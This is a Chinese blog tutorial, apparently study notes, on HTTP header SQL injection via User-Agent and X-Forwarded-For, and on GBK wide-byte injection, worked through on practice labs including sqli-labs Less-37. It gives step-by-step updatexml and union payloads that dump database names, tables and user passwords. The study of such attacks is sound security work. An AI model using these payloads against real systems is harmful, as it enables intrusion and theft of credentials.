head头部注入、宽字节注入

最新推荐文章于 2024-08-06 00:32:13 发布
最新推荐文章于 2024-08-06 00:32:13 发布
阅读量515 收藏 1
点赞数 1
分类专栏: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_43238111/article/details/106313127
版权

head头部注入

原理

在传递参数时,利用请求头部参数传递参数,变成构造sql语句,然后发送执行sql语句

超全局变量是:
$_REQUEST (获取GET/POST/COOKIE) COOKIE在新版本已经无法获取了
$_POST (获取POST传参)
$_GET (获取GET的传参)
$_COOKIE (获取COOKIE的值)
$_SERVER (包含了诸如头信息(header)、路径(path)、以及脚本位置(script locations)等等信息的数组)
$_SERVER功能强大。

常用的:
$_SERVER[‘HTTP_HOST’] 请求头信息中的Host内容,获取当前域名。
$_SERVER[“HTTP_USER_AGENT”] 获取用户相关信息,包括用户浏览器、操作系统等信息。
$_SERVER[“REMOTE_ADDR”] 浏览网页的用户ip。

案例

Payload:利用报错注入爆数据,一般用updatexml()函数连用

任务一:
观察源代码,写在user-agent后面
http://injectx1.lab.aqlab.cn:81/Pass-07/index.php
①’or sleep(5),1)#:观察睡眠效果
在这里插入图片描述
②爆库
'or updatexml(1,concat(0x7e,(database()),0x7e),1),1)#
在这里插入图片描述
③爆数据表
’ or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database() ),0x7e),1),1)#
在这里插入图片描述
④爆数据字段名
’ or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=‘head_error’ and table_name=‘user’),0x7e),1),1)#
在这里插入图片描述
⑤爆数据
’ or updatexml(1,substring(concat(0x7e,(select group_concat(id,0x3a,username,0x3a,password,0x3a) from head_error.user),0x7e),1,32),1),1)#

`

补充:XFF攻击:X_FORWARDED_FOR
案例
任务三:
观察源码,自行添加(CLIENT-IP,X-FORWARDED-FOR)
http://injectx1.lab.aqlab.cn:81/Pass-09/index.php?action=show_code
①’or sleep(5),1)#:观察睡眠效果
②爆库
X-FORWARDED-FOR: ’ or updatexml(1,concat(0x7e,(select database()),0x7e),1),1)#
③爆数据表
’ or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database() ),0x7e),1),1)#
④爆数据字段名
’ or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=‘head_error’ and table_name=‘user’),0x7e),1),1)#
⑤爆数据
’ or updatexml(1,substring(concat(0x7e,(select group_concat(id,0x3a,username,0x3a,password,0x3a) from head_error.user),0x7e),1,32),1),1)#

宽字节注入

原理

①两个以上的字节就是宽字节。
②由于我们的单引号会被转义为‘ \' ’利用一个ascii码值大于128的字符与‘\’结合形成一个汉字和一个单引号
③利用编码转换,将服务器端强制添加的本来用于转义的\符号吃掉,从而能使攻击
者输入的引号起到闭合作用,以至于可以进行SQL注入。

案例

3:对sqli Less-37进行宽字节注入
①判断字段
uname=1%df’ order by 3 #&passwd=&submit=Submit在这里插入图片描述
②判断输出位置
uname=1%df’ union select 1,2 #&passwd=&submit=Submit
在这里插入图片描述
③爆数据库
uname=1%df’ union select database(),2 #&passwd=&submit=Submit
在这里插入图片描述
④爆数据表
uname=1%df’ union select (select group_concat(table_name) from information_schema.tables where table_schema=database()),2 #&passwd=&submit=Submit
在这里插入图片描述
⑤爆数据字段名
uname=1%df’ union select (select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x7573657273),2 #&passwd=&submit=Submit
在这里插入图片描述
⑥爆数据值
uname=1%df’ union select (select group_concat(username,password) from users),2 #&passwd=&submit=Submit
在这里插入图片描述

字符集

字符集也叫字符编码,是一种将符号转换为二进制数的映射关系。

几种常见的字符集:

ASCII 编码:单字节编码
latin1 编码:单字节编码
gbk 编码:使用一字节和双字节编码, 0x00-0x7F 范围内是一位,和 ASCII 保持一致。双字节的
第一字节范围是 0x81-0xFE UTF-8 编码:使用一至四字节编码, 0x00–0x7F 范围内是一位,和 ASCII 保持一致。其它字符用
二至四个字节变长表示。

每种编码方式的特点:

【1】ASCII 每个字符占据1bytes,用二进制表示的话最高位必须为0(扩展的ASCII不在考虑范围
内),因此ASCII只能表示128个字
【2】GB2312 最早一版的中文编码,每个字占据2bytes。由于要和ASCII兼容,那这2bytes最高位
不可以为0了(否则和ASCII会有冲突)。
【3】一个gbk汉字占两个字节,取值范围是(编码位数):第一个字节是(129-254),第二个字
节(64-254),当设置gbk编码后,遇到连续两个字节,都符合gbk取值范围,会自动解析为一个
汉字

在这里插入图片描述

渗透测试基础-Head注入
学习、分享、交流
05-16 969
前提:目标网址会记录你的一些head信息,放进数据库,那么只要放进数据库,就说明与数据库产生了交互。 --> 可能就存在数据库注入漏洞。
head 注入
晨辰.的博客
03-21 5519
Head 注入
基于HTTP头部注入
热门推荐
seaboat——a free boat on the sea.(公众号:远洋号)
06-13 1万+
基于HTTP头部注入常见的sql注入一般都是通过表单或请求参数进行注入,但这里给出的例子是通过HTTP协议头部进行注入。例如一个的请求如下:GET / HTTP/1.1 Host: www.example.com Connection: keep-alive Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image
head注入(三)
qq_45300786的博客
07-06 764
在平时上网冲浪中,我们经常去访问一起网站,比如我们经常访问的百度 但是面对越来越多的用户来访问,如果只有一台服务器,那么肯定会崩掉, 那么就有很多台服务器来处理这些请求,以此来满足用户的需求, 1、通过代理来找到离用户最近的服务器。 你提出请求 > 代理商(CDN)> 最近服务器处理你的请求并返回你想要的数据 服务器只会记录下代理商的ip,而不会记录下你的ip,这就会使得灭有你的ip 为了解决这一问题,X-Forwarded-For就出现了,用来记录你的ip, 然后代理商会在自己的数
注入全方位利用-POST注入HEAD注入
weixin_30379911的博客
08-04 724
注入全方位利用-POST注入HEAD注入 一、POST注入介绍 注入攻击的本质,是把用户输入的数据当做代码执行。 这里有两个关键条件: 第一个是用户能够控制输入 第二个是原本程序要执行的代码,拼接了用户输入的数据 POST注入属于注入的一种,相信大家都知道POST\GET两种传参方式。 POST注入就是使用POST进行传参的注入,本质上和GET类型的没什么区别 ...
宽字节编码类型的XSS
安全汪
06-25 3725
今晚又看了一遍PKAV-心上的瘦子写的xss腾讯系列的例子,收获挺大的,其中对宽字节注入有了更深的了解,又查找了一些相关的资料,整理一下,以备以后查阅 参考文档: http://book.2cto.com/201301/14515.html http://itindex.net/detail/47408-xss-%E5%AD%A6%E4%B9%A0-xss http://ww
【web安全】安装dvwa | sql注入复习
Vector_seven的博客
09-07 254
密码admin密码password80端口默认可以访问到,但是其他端口并未对外开放服务端对用户输入的数据未做严格的检测或过滤,导致用户输入的恶意sql命令拼接到正常的sql中成功执行,造成数据的修改和窃取等损失用户输入的数被当作代码执行(违背了“数据与代码分离”的安全原则)1)用户可控参数 2)传入的恶意sql可以被成功执行寻找存在注入的方式:通常是 单引号 测试对比页面回显判断(一)GET:url中,涉及url编码(二)POST:(三)HEAD:包括cookie、user-agent、x-forwar
sql注入部分总结和复现
最新发布
iteuko的博客
08-06 905
一个端口对应一个服务。
[授权发表]缓冲区溢出与注入分析
04-12 2254
这是开源书籍[《C语言编程透视》](http://www.tinylab.org/project/hello-c-world/)第五章,如果您喜欢该书,请关注我们的新浪微博[@泰晓科技](http://weibo.com/tinylaborg)。
安全编码实践手册:防御SQL注入、XSS等常见漏洞的关键策略
本文首先介绍了安全编码的基础知识,随后分别针对SQL注入、跨站脚本攻击(XSS)、跨站请求伪造(CSRF)以及其他安全漏洞的防御方法进行了详细阐述。通过对各种攻击的原理、危害及防御策略的分析,提出了使用预编译...
18、SQL HEAD注入
songling515010475的专栏
05-22 416
Head注入的区别与GET/POST的区别在于,HEAD时面的参数如果不存数据库,注入进去是没有任何意义的,而GET/POST在业务增删改查过种中上肯定会要操作数据库的,但现在软件一般都有日志记录,保存到数据库中。 虽然我知道 这是Head注入,但忍不住试一下POST能不能提交,哈哈被过滤了* 进入正题: 获取数据库库名 User-Agent:’ or updatexml(1,concat(0x7e,(select database())),1),1)# User-Agent本身是用于后台识别客户端
掌控安全 -- header注入
qq_53058639的博客
07-07 757
header中获取客户端的一些信息(比如useragent用户代理等其他httpheader字段信息),因为这些信息是会重新返回拼接到后台中的,所以再对这些信息进行sql处理,又因为后台没有进过相对应的信息处理所以构成了sql注入。**总结就是:在传参时,后端为了验证或者获取的一些信息,将这些信息存入到数据库但没有进行相关的处理,所以存在了header注入
$_SERVER详解
lky_for_lucky的博客
12-16 1429
Brush $_SERVER详解 $_SERVER[‘HTTP_ACCEPT_LANGUAGE’]//浏览器语言 $_SERVER[‘REMOTE_ADDR’] //当前用户 IP 。 $_SERVER[‘REMOTE_HOST’] //当前用户主机名 $_SERVER[‘REQUEST_URI’] //URL $_SERVER[‘REMOTE_PORT’] //端口。 $_SERVER[‘SERVER_NAME’] //服务器主机的名称。 $_SERVER[‘PHP_SELF’]//正在执行脚本的文件名
Head注入
monkey:的博客
11-19 322
HEAD注入-(掌控安全)
weixin_74410605的博客
07-15 343
其次从上图②处的sql语句中单引号闭合的$uagent结合①处可以得出,注入点是USER_AGENT。分析之后就可以打开burpsuite开始抓包,如下图,发送至repeater。在我们传参时,后端为了验证或者获取客户端的一些信息,将这些信息存入到数据库但没有进行相关的处理,所以存在了注入。除了本关考点告诉我们是head注入,还可以从源码的全局变量猜测出是head注入。发现存在延时注入,从而进一步确认USER_AGENT是注入点。接着查询表名,发现有个表名是flag_head。查询flag_h1里的内容。
POST注入/HEAD注入
weixin_49959448的博客
05-07 293
POST注入/HEAD注入POST注入Head注入 POST注入 跟GET注入的本质区别 只是传参方式的不同,本质上没有什么区别 POST注入高危点: 登录框 查询框 等各种和数据库有交互的框 POST注入最经典的万能密码: 'or 1=1 --qwe 这样就可以直接登录成功 表单不一定是POST传参 Head注入 首先什么是Head注入? 我们先从靶场随便抓一个包 最下面一行五颜六色的就是POST注入的参数 而上面那一大块就是Head注入的参数 Head注入分为两类: 1.盲注 2.报错注入 这里我们
HEAD注入靶场作业
weixin_45540609的博客
04-17 415
HEAD注入1——使用mode header报错 1、暴力破解密码 由于head注入需要知道登录名和密码,于是我们用burp暴力破解出用户名和密码 先在登录框中随便输入用户名和密码,用burp抓包,把抓包的内容发送给intruder 在intruder-position选项卡中的Attack type选项,选择Cluster bomb,把username后内容和password后内容Add& Payload设置第一个add&和第二个add&,可以猜用户名和使用字..
利用HTTP Host header头攻击技术详解
weixin_50464560的博客
07-23 3349
利用HTTP Host header头攻击技术详解 一般通用web程序是如果想知道网站域名不是一件简单的事情,如果用一个固定的URI来作为域名会有各种麻烦。开发人员一般是依赖HTTP Host header(比如在php里是_SERVER[“HTTP_HOST”] ),而这个header很多情况下是靠不住的。而很多应用是直接把这个值不做html编码便输出到了页面中,比如: <link href="http://_SERVER['HOST']" (Joomla) 还有的地方还包含有secret key和
14、注入篇-- Header注入
WX公众号-小白学安全
04-05 1152
文章目录原理利用防范靶场 原理 利用 防范 靶场
Preact-head-tag:SSR兼容的小型磁头组件
preact-head-tag的使用场景包括但不限于在服务端渲染时动态地注入头部信息,或是在客户端JavaScript执行前需要预设的头部内容。这对于构建高性能的Web应用是十分关键的。 标签中的"JavaScript"表示preact-head-tag...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值